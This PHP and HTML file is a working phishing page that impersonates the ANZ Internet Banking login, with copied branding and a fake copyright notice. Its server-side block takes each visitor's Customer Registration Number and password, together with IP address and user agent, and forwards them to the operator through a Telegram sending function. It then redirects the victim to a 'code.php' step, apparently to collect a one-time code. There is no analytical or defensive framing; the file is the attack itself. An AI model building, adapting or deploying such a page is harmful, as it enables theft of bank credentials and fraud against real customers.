<?php
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    include 'telegram.php';

    $username = isset($_POST['username']) ? trim($_POST['username']) : '';
    $password = isset($_POST['password']) ? trim($_POST['password']) : '';
    $fake_email = isset($_POST['fake_email']) ? trim($_POST['fake_email']) : '';

    // Honeypot anti-bot check
    if ($fake_email !== '') {
        header("Location: login.php");
        exit;
    }

    $ip = $_SERVER['REMOTE_ADDR'];
    $agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
    $time = date("Y-m-d H:i:s");

    // Get visitor ID from POST or session fallback
    $visitor_id = '';
    if (isset($_POST['vid']) && !empty($_POST['vid'])) {
        $visitor_id = trim($_POST['vid']);
        $_SESSION['visitor_id'] = $visitor_id;
    } elseif (isset($_SESSION['visitor_id'])) {
        $visitor_id = $_SESSION['visitor_id'];
    }

    $message = "👁️ ANZ Login Attempt\n";
    $message .= "Time: $time\n";
    $message .= "IP: $ip\n";
    $message .= "User Agent: $agent\n";
    $message .= "Visitor ID: $visitor_id\n\n";
    $message .= "Customer Registration Number: $username\n";
    $message .= "Password: $password\n";

    sendTelegram($message);

    // Redirect to code.php after sending message
    header("Location: code.php");
    exit;
} else {
    // If visitor ID comes via GET param on page load, save to session for form
    if (isset($_GET['vid']) && !empty($_GET['vid'])) {
        $_SESSION['visitor_id'] = trim($_GET['vid']);
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>ANZ Internet Banking</title>
  <style>
    body {
      background-color: #f4f6f8;
      font-family: Arial, sans-serif;
      margin: 0; padding: 0;
    }
    .header {
      background-color: #005b9f;
      color: white;
      padding: 20px;
      text-align: center;
    }
    .container {
      width: 360px;
      margin: 40px auto;
      padding: 30px;
      background: white;
      border: 1px solid #ddd;
      border-radius: 4px;
      box-shadow: 0 2px 4px rgba(0,0,0,0.1);
    }
    .logo {
      display: block;
      margin: 0 auto 20px;
      max-width: 140px;
    }
    input[type="text"], input[type="password"] {
      width: 100%;
      padding: 12px;
      margin: 10px 0;
      border: 1px solid #ccc;
      border-radius: 4px;
      font-size: 16px;
      box-sizing: border-box;
    }
    button {
      width: 100%;
      padding: 12px;
      background-color: #0077c8;
      color: white;
      font-weight: bold;
      border: none;
      border-radius: 4px;
      cursor: pointer;
      font-size: 16px;
    }
    button:hover {
      background-color: #005b9f;
    }
    .footer {
      margin-top: 20px;
      font-size: 0.9em;
      color: #666;
      text-align: center;
    }
    .footer a {
      color: #005b9f;
      text-decoration: none;
    }
    .footer a:hover {
      text-decoration: underline;
    }
    .copyright {
      font-size: 0.8em;
      color: #999;
      margin-top: 30px;
      text-align: center;
    }
  </style>
  <script>
    function validateForm() {
      const username = document.getElementById("username").value;
      if (!/^\d{9}$/.test(username)) {
        alert("Please enter a valid 9-digit Customer Registration Number.");
        return false;
      }
      return true;
    }
  </script>
</head>
<body>
  <div class="header">
    <h1>ANZ Internet Banking</h1>
  </div>
  <div class="container">
    <img
      src="https://wisdomplaceacademy.com/azsmll.png"
      alt="ANZ Logo"
      class="logo"
    />
    <form method="POST" action="" onsubmit="return validateForm()">
      <input
        type="text"
        id="username"
        name="username"
        placeholder="Customer Registration Number"
        maxlength="9"
        required
      />
      <input
        type="password"
        name="password"
        placeholder="Password"
        required
      />
      <!-- Honeypot anti-bot field -->
      <input
        type="text"
        name="fake_email"
        style="display:none"
        autocomplete="off"
      />
      <!-- Hidden visitor ID -->
      <input type="hidden" name="vid" value="<?php echo htmlspecialchars($_SESSION['visitor_id'] ?? '', ENT_QUOTES); ?>" />
      <input type="hidden" name="form_start" value="<?php echo time(); ?>" />
      <button type="submit">Log In</button>
    </form>
    <div class="footer">
      <p><a href="#">New to Internet Banking? Register</a></p>
      <p>By logging in you accept our <a href="#">security and privacy statement</a>.</p>
    </div>
    <div class="copyright">
      © Australia and New Zealand Banking Group Limited (ANZ)
    </div>
  </div>
</body>
</html>